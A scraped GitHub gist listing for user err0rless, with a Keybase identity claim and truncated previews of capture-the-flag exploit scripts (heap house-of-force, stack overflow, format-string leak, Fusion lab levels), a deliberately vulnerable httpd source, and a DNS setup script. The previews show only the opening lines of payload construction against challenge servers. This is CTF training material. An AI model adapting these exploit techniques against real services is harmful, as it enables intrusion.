I hereby claim:
- I am err0rless on github.
- I am err0rless (https://keybase.io/err0rless) on keybase.
- I have a public key ASCgWfK7wyYyKADMmaUsEGUj4Dz6TKBFfSbBcIcuUBCpYgo
To claim this, I am signing this object:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # BCTF 2016 pwnable bcloud | |
| # HOUSE OF FORCE, Heap exploit task | |
| from pwn import connst, dump | |
| from struct import pack, unpack | |
| s, t = connst("192.168.36.150", 9991) | |
| print s.recv(1024) | |
| s.send("A" * 63 + "Z") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Holyshield 2016 Exploitation 300 VOD solution | |
| from pwn import connst, dump, shell | |
| from struct import pack, unpack | |
| s, t = connst("1.224.175.17", 9101) | |
| print t.read_until("input number :") | |
| s.send("1\n") | |
| # Leak printf@libc address |
err0rless
/ 32c3CTF_teufel.py
Created
December 31, 2015 13:33
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # 32c3 CTF 2015 teufel @ 200pts | |
| # the stack based overflow on the x86_64 system | |
| from pwn import connst, shell | |
| from struct import pack, unpack | |
| s, t = connst("136.243.194.41", 666) | |
| s.send(pack("Q", 0x09)) | |
| s.send("DDDDDDDDD") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import connst | |
| from struct import pack | |
| s, t = connst("136.243.194.62", 1024) | |
| print t.read_until("name? ") | |
| s.send(pack("Q", 0x00400d20) * 68 + pack("Q", 0x00600d20) * 15 + "\n") | |
| print t.read_until("flag: ") | |
| s.send("LIBC_FATAL_STDERR_=1\n") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Seccon 2015 Quals - Exploit FSB:TreeWalker 200pts Solves:51 | |
| # github.com/SECCON/SECCON2015_online_CTF/tree/master/Exploit/200_FSB:%20TreeWalker | |
| # FSB Leak task :) | |
| from err0rless import connst | |
| from struct import pack, unpack | |
| s, t = connst("treewalker.pwn.seccon.jp", 20000) | |
| def leak(addr): | |
| p = "%p" * 20 # p = "%llx" * 30 |
err0rless
/ Windows_DNS_autoset.ps1
Last active
April 5, 2016 05:19
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Created by err0rless 2015-11-15 | |
| Windows Server 2015 DNS Primary-zone auto set script | |
| PS C:\Users\Administrator\Desktop> (Get-Host).version | |
| Major Minor Build Revision | |
| ----- ----- ----- -------- | |
| 3 0 -1 -1 | |
| Powershell version 3.0 |
err0rless
/ fusion04.py
Last active
November 6, 2015 18:09
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from err0rless import connst, conns, dump | |
| from struct import pack, unpack | |
| import re, string, base64, time, socket, telnetlib | |
| def send_request(password, ret_conn=0): | |
| s = conns("192.168.95.152", 20004) | |
| r = "GET / HTTP/1.0\r\n" | |
| r += "Authorization: Basic " | |
| r += base64.b64encode(password) |
err0rless
/ fusion_level04.c
Created
November 2, 2015 16:11
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "../common/common.c" | |
| // original code from micro_httpd_12dec2005.tar.gz -- acme.com. added vulnerabilities etc ;) | |
| /* micro_httpd - really small HTTP server | |
| ** | |
| ** Copyright (c) 1999,2005 by Jef Poskanzer <jef@mail.acme.com>. | |
| ** All rights reserved. | |
| ** | |
| ** Redistribution and use in source and binary forms, with or without |
err0rless
/ fusion03.py
Last active
November 4, 2015 09:30
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from err0rless import connst | |
| from struct import pack | |
| import hmac, hashlib | |
| s, t = connst("192.168.95.152", 20003) | |
| # HMAC with hashlib.sha1 | |
| def HMAC(key, data): | |
| h = hmac.new(key, data, hashlib.sha1) | |
| h = h.hexdigest() |
NewerOlder